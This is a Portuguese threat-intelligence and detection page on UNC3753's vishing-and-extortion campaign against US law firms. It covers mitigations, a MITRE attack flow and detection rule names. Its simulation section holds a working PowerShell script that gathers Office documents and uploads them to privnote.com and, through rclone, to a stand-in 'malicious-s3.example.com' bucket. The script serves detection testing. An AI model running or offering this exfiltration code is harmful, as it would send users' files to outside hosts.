Buscando Conselho: Ataques Direcionados Continuados Contra Escritórios de Advocacia dos EUA
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Um cluster de ameaças com motivação financeira rastreado como UNC3753 está executando campanhas de vishing que enganam as vítimas para instalar software de monitoramento e gerenciamento remoto. Uma vez estabelecido o acesso, os invasores roubam informações confidenciais legais e financeiras e depois extorquem a organização vítima ameaçando expor publicamente. A campanha é focada em empresas de serviços profissionais dos EUA, em particular escritórios de advocacia, e pode envolver tanto roubo de dados cibernéticos quanto físicos.
Investigação
A Mandiant observou o ciclo completo de intrusão, desde a chamada inicial de phishing por voz até o roubo de dados e extorsão, às vezes dentro de um único dia útil. As vítimas foram convencidas a usar ferramentas de compartilhamento de tela e software de RMM, como AnyDesk, Bomgar ou um instalador personalizado SuperOps entregue com um comando curl. A exfiltração de dados foi realizada usando ferramentas como WinSCP, Rclone ou uploads diretos para contas de armazenamento em nuvem de consumidores.
Mitigação
As organizações devem treinar funcionários para reconhecer tentativas de vishing, impor procedimentos de verificação rigorosos para qualquer solicitação de suporte remoto e bloquear ferramentas de RMM e compartilhamento de tela não autorizadas. Desativar mídias removíveis, monitorar transferências externas incomuns para armazenamento em nuvem ou destinos FTP, aplicar controles de acesso condicional ao VDI e impor MFA em repositórios de documentos críticos pode reduzir ainda mais o risco.
Resposta
Se esta atividade for detectada, isole o endpoint afetado imediatamente, termine quaisquer sessões remotas não autorizadas e remova os binários RMM instalados. Os investigadores devem coletar o histórico de linha de comando, alterações no registro e artefatos de tarefas agendadas para revisão forense. Credenciais comprometidas devem ser redefinidas, a exfiltração de dados deve ser avaliada e o envolvimento das autoridades pode ser considerado se a extorsão tiver começado.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccccff classDef operator fill:#ff9900 %% Node definitions initial_access["<b>Ação</b> – <b>T1566.004 Phishing: Spearphishing por Voz</b><br/><b>Descrição</b>: O atacante usa uma chamada de voz convincente para enganar o alvo a fornecer credenciais ou executar comandos maliciosos."] class initial_access action user_execution["<b>Ação</b> – <b>T1204.002 Arquivo Malicioso</b><br/><b>Ferramenta</b>: cURL + Instalador MSI<br/><b>Descrição</b>: A vítima executa um arquivo MSI malicioso baixado via cURL, resultando na execução de código no sistema."] class user_execution action remote_desktop["<b>Ação</b> – <b>T1219.002 Software de Área de Trabalho Remota</b><br/><b>Ferramentas</b>: Zoom, Microsoft Teams, AnyDesk<br/><b>Descrição</b>: Aplicações legítimas de área de trabalho remota ou reunião são abusadas para manter acesso remoto persistente."] class remote_desktop action discovery["<b>Ação</b> – <b>T1083 Descoberta de Arquivos e Diretórios</b> & <b>T1680 Descoberta de Armazenamento Local</b><br/><b>Descrição</b>: O adversário enumera arquivos, diretórios e locais de armazenamento local para localizar dados valiosos para exfiltração."] class discovery action data_staging["<b>Ação</b> – <b>T1074 Dados Preparados</b> & <b>T1560 Arquivo de Dados Coletados</b><br/><b>Descrição</b>: Os arquivos coletados são preparados localmente e comprimidos em arquivos para preparar para a exfiltração."] class data_staging action exfiltration["<b>Ação</b> – <b>T1567.002 Exfiltração para Armazenamento em Nuvem</b> & <b>T1020 Exfiltração Automatizada</b><br/><b>Alvo</b>: Google Drive<br/><b>Descrição</b>: Upload automatizado de arquivos preparados para um serviço de armazenamento em nuvem para extração remota."] class exfiltration action physical_media["<b>Ação</b> – <b>T1052 Exfiltração via Mídia Física</b><br/><b>Descrição</b>: Transferência de dados para mídias removíveis para exfiltração offline quando os canais de rede são restritos."] class physical_media action cleanup["<b>Ação</b> – <b>T1070.001 Limpar Registros de Eventos do Windows</b><br/><b>Descrição</b>: Exclusão de registros de eventos do Windows para apagar evidências da intrusão."] class cleanup action %% Edge connections initial_access –>|lead_to| user_execution user_execution –>|enables| remote_desktop remote_desktop –>|enables| discovery discovery –>|lead_to| data_staging data_staging –>|enables| exfiltration exfiltration –>|lead_to| physical_media physical_media –>|followed_by| cleanup "
Fluxo de Ataque
Detecções
Software de Acesso Remoto/ Gerenciamento Alternativo (via criação_de_processo)
Visualizar
Uso Suspeito de CURL (via linha_de_comando)
Visualizar
Tentativa de Instalação de Software SuperOps RMM Possível (via evento_de_arquivo)
Visualizar
Software de Acesso Remoto/ Gerenciamento Alternativo (via sistema)
Visualizar
Software de Acesso Remoto/ Gerenciamento Alternativo (via auditoria)
Visualizar
Tentativa de Instalação de Software RMM Usando MsiInstaller (via logs de aplicação)
Visualizar
IOCs (SourceIP) para detectar: Procurando Conselhos: Campanha Alvo Contínua Contra Escritórios de Advocacia dos EUA
Visualizar
IOCs (DestinationIP) para detectar: Procurando Conselhos: Campanha Alvo Contínua Contra Escritórios de Advocacia dos EUA
Visualizar
Detecção de Compartilhamento de Arquivos Não Autorizado e Tráfego SSH de Alto Volume [Firewall]
Visualizar
Exfiltração de Dados UNC3753 Usando Privnote e Ferramentas de Transferência de Arquivos [Conexão de Rede do Windows]
Visualizar
Acesso Remoto UNC3753 e Instalação Maliciosa de MSI [Criação de Processo do Windows]
Visualizar
Execução da Simulação
Pré-requisito: O Cheque de Pré-voo de Telemetria & Base deve ter sido aprovado.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente as TTPs identificadas e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.
-
Narrativa do Ataque & Comandos:
-
Recon & Preparação de Dados (T1005, T1083):
O adversário enumera diretórios de usuários e copia todos os*.docxand*.xlsxarquivos para uma pasta de preparaçãoC:TempStagedData. -
Upload via Privnote (T1567.002):
Usando PowerShell, o invasor lê cada arquivo, codifica em base‑64 o conteúdo, e o envia parahttps://privnote.com/api/note. A linha de comando inclui a URL, que satisfaz a condiçãoselection_privnote. -
Transferência com Rclone (T1020):
O invasor executarclone.exe(baixado em tempo real) para enviar os arquivos preparados para um bucket S3 malicioso. O nome do processo “rclone.exe” corresponde aselection_tool. -
Limpeza: Exclua a pasta de preparação e quaisquer binários residuais.
-
-
Script de Teste de Regressão: (PowerShell – auto‑contido, sem dependências externas além de
Invoke-WebRequest.)# ------------------------------------------------- # Simulação de Exfiltração UNC3753 – PowerShell # ------------------------------------------------- # 1. Preparar diretório de preparação $staging = "$env:USERPROFILETempStagedData" New-Item -ItemType Directory -Force -Path $staging | Out-Null # 2. Copiar dados de amostra (simular coleta de dados) Get-ChildItem -Path "$env:USERPROFILEDocuments" -Include *.docx, *.xlsx -Recurse -ErrorAction SilentlyContinue | ForEach-Object { Copy-Item -Path $_.FullName -Destination $staging -Force } # 3. Carregar cada arquivo para o Privnote (exfiltração via web-serviço) $privnoteUrl = "https://privnote.com/api/note" Get-ChildItem -Path $staging -File | ForEach-Object { $content = [Convert]::ToBase64String([IO.File]::ReadAllBytes($_.FullName)) $body = @{ text = $content } # A URL aparece na linha de comando -> ativa selection_privnote Invoke-WebRequest -Uri $privnoteUrl -Method POST -Body $body -UseBasicParsing | Out-Null } # 4. Baixar Rclone (se não presente) e exfiltrar via S3 $rcloneExe = "$env:TEMPrclone.exe" if (-not (Test-Path $rcloneExe)) { Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "$env:TEMPrclone.zip" Expand-Archive -Path "$env:TEMPrclone.zip" -DestinationPath $env:TEMP -Force Move-Item -Path (Get-ChildItem "$env:TEMPrclone-*-windows-amd64rclone.exe").FullName -Destination $rcloneExe -Force } # Configurar um bucket S3 remoto (malicioso) – a configuração é escrita em um arquivo temporário $rcloneConfig = @" [malicious type = s3 provider = AWS access_key_id = AKIAFAKEKEY secret_access_key = fakeSecretKey123 region = us-east-1 endpoint = https://malicious-s3.example.com "@ $configPath = "$env:TEMPrclone.conf" $rcloneConfig | Set-Content -Path $configPath -Encoding ASCII # Executar rclone copy – nome do processo "rclone.exe" ativa selection_tool & $rcloneExe copy $staging "malicious:exfil" --config $configPath --log-level INFO # 5. Limpeza Remove-Item -Recurse -Force $staging Remove-Item -Force $rcloneExe, $configPath -
Comandos de Limpeza:
# Encerrar quaisquer processos remanescentes de WinSCP ou Rclone Get-Process -Name WinSCP, rclone -ErrorAction SilentlyContinue | Stop-Process -Force # Excluir arquivos temporários deixados para trás (se houver) Remove-Item -Path "$env:TEMPWinSCP.exe","$env:TEMPWinSCP.zip","$env:TEMPrclone.zip","$env:TEMPrclone-*-windows-amd64" -Recurse -Force -ErrorAction SilentlyContinue